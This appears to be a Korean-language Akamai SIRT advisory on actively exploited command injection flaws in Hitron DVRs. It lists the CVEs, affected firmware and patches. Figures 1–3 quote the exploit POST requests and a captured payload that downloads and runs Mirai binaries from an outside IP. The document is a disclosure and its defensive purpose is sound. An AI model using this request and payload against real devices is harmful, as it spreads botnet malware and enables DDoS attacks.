Hitron DVR의 취약점을 적극적으로 악용: 수정됨, 패치 사용 가능
Executive Summary
Akamai 보안 인텔리전스 대응팀(SIRT)은 InfectedSlurs 권고 시리즈에 대한 추가 업데이트를 영향받는 벤더사 중 한 곳이 패치와 가이드를 출시한 이후 발표했습니다.
Hitron 내 취약점은 실제 환경에서 확인되었으며 다음 CVE ID가 지정되었습니다.
CVE-2024-22768 - CVSS v3.1에서 기본 점수 7.4 가 책정됨, CVSS 벡터 문자열은 (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).
CVE-2024-22769 - CVSS v3.1에서 기본 점수 7.4 가 책정됨, CVSS 벡터 문자열은 (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).
CVE-2024-22770 - CVSS v3.1에서 기본 점수 7.4 가 책정됨, CVSS 벡터 문자열은 (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).
CVE-2024-22771 - CVSS v3.1에서 기본 점수 7.4 가 책정됨, CVSS 벡터 문자열은 (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).
CVE-2024-22772 - CVSS v3.1에서 기본 점수 7.4 가 책정됨, CVSS 벡터 문자열은 (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).
CVE-2024-23842 - CVSS v3.1에서 기본 점수 7.4 가 책정됨, CVSS 벡터 문자열은 (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).
실제 환경에서 캡처된 악성 페이로드는 DDoS(Distributed Denial-of-Service) 봇넷을 생성하기 위해 Mirai 기반 멀웨어를 설치합니다.
Akamai는 원래 리서치에서 이러한 악용 시도를 식별하고 보안팀 직원 네트워크에서 발생할 수 있는 활성 감염을 식별하는 데 도움이 되는 광범위한 IOC(Indicator of Compromise), Snort 룰, YARA 룰 목록을 제공했습니다.
알아야 할 사항
Akamai SIRT는 InfectedSlurs를 발견하는 과정에서, 활발히 악용되고 있는 여러 Hitron DVR 디바이스 모델의 취약점을 밝혀냈습니다. Hitron 디바이스는 대한민국의 Hitron Systems가 제조합니다.
이 취약점을 통해 인증된 공격자는 POST 요청을 통해 관리 인터페이스로 페이로드를 전달해 OS 명령 인젝션을 수행할 수 있습니다. 현재 설정에서는 캡처된 페이로드에서 디바이스 기본 인증정보를 활용합니다.
영향받는 디바이스 및 펌웨어 버전은 다음과 같습니다.
DVR HVR-4781: 버전 1.03~4.02
DVR HVR-8781: 버전 1.03~4.02
DVR HVR-16781: 버전 1.03~4.02
DVR LGUVR-4H: 버전 1.02~4.02
DVR LGUVR-8H: 버전 1.02~4.02
DVR LGUVR-16H: 버전 1.02~4.02
벤더사(Hitron Systems)는 이 취약점을 해결하기 위해 새로운 펌웨어 버전을 출시했으며, 영향받는 모든 모델을 가능한 한 빨리 4.03 이상의 펌웨어로 업그레이드할 것을 권장합니다. 이 권고는 CISA 및 KISA를 통해서도 게시되었습니다. KISA는 개별 CVE와 관련된 권고도 발표했으며, 다음 링크에서 확인할 수 있습니다.
관찰된 악용
2023년 10월 말 Akamai SIRT 분석가는 거의 남용되지 않는 TCP 포트를 표적으로 삼은 허니팟에서 활동이 급증하는 것을 발견했습니다. 프로브는 낮은 주파수였으며 POST 요청을 통해 처음으로 /cgi-bin/system_ntp.cgi 항목에 대한 인증(그림 1)을 시도한 후 명령 인젝션 악용 시도(그림 2)를 감행했습니다. 표적이 된 디바이스는 명령 입력을 통해 RCE에 취약한 Hitron Systems DVR 디바이스(그림 3)였습니다. 인증을 마친 후 공격자는 타임서버 매개변수에서 /cgi-bin/system_ntp.cgi항목에 대한 POST 요청을 통해 명령 인젝션의 취약점을 노렸습니다.
URL: /cgi-bin/system_ntp.cgi
POST BODY:
enc=11&ip=[targeted IP]&username=[REDACTED]&password=[REDACTED]
그림 1: 인증 시도
URL: /cgi-bin/system_ntp.cgi
POST BODY:
lang=ja&useNTPServer=1&synccheck=1&public=0×erver=[RCE
PAYLOAD]&interval=60&enableNTPServer=1
그림 2: 악용 시도
curl+http://45.142.182.96/spl/mips+-O;+chmod+777+mips;+./mips+kdvr;curl+http://45.142.182.96/spl/x86+-O;+chmod+777+x86;+./x86+kdvr;curl+http://45.142.182.96/spl/mpsl+-O;+chmod+777+mpsl;+./mpsl+kdvr;curl+http://45.142.182.96/spl/arm+-O;+chmod+777+arm;+./arm+kdvr;curl+http://45.142.182.96/spl/arm5+-O;+chmod+777+arm5;+./arm5+kdvr;curl+http://45.142.182.96/spl/arm6+-O;+chmod+777+arm6;+./arm6+kdvr;curl+http/45.142.182.96/spl/arm7+-O;+chmod+777+arm7;+./arm7+kdvr
그림 3: 캡처된 RCE 페이로드
보호
이 취약점의 영향을 받는 디바이스를 실행하는 Hitron DVR 사용자는 즉시 RCE 취약점을 수정하는 최신 펌웨어 버전(4.03 이상)으로 업그레이드해야 합니다.
HVR-4781: 버전 4.03
HVR-8781: 버전 4.03
HVR-16781: 버전 4.03
LGUVR-4H: 버전 4.03
LGUVR-8H: 버전 4.03
LGUVR-16H: 버전 4.03
또한 이러한 위협과 미래의 위협으로부터 보호하기 위해 여러 가지 보안 조치를 구축해야 합니다. 먼저, 영향받는 디바이스를 사용하는 기업과 개인은 보안을 강화하기 위해 기본 로그인 인증정보를 즉시 변경해야 합니다. 네트워크 트래픽 및 로그를 정기적으로 모니터링하면 의심스러운 활동을 조기에 탐지하는 데 도움이 될 수 있습니다. 식별된 취약점을 해결하기 위해서는 디바이스 제조업체에서 제공하는 보안 패치 및 업데이트를 적시에 설치하는 것이 중요합니다.
보안 연구원, 위협 인텔리전스 공급업체, 동종 업체와의 협력을 통해 새로운 위협과 취약점에 대한 최신 정보를 얻을 수 있습니다. 마지막으로, 연결된 디바이스의 업데이트된 재고를 유지 관리하고 네크워크 세그멘테이션을 구축하여 이러한 공격의 잠재적인 영향을 제한할 수 있습니다.
결론
Hitron 시스템 및 관련 디바이스에서 식별된 보안 문제를 해결하려면 사용자 인식, 즉각적인 패치 적용, 선제적 모니터링, 사이버 보안 커뮤니티 내 협업을 결합한 다각적인 접근 방식이 필요합니다. 이러한 조치를 취하면 기업과 개인이 관찰된 악성 활동으로 인한 리스크를 크게 줄일 수 있습니다.
관심 유지
SIRT 및 기타 Akamai 보안 리서치 그룹에서 찾은 위협 및 기타 조사 결과를 알아보려면 X(기존의 Twitter)에서 Akamai를 팔로우하거나 SIG 허브를 확인하시기 바랍니다.
Akamai SIRT는 취약점을 벤더사에 보고하는 데 도움을 준 CISA, US-CERT, KISA의 직원들에게 감사의 말씀을 전합니다.
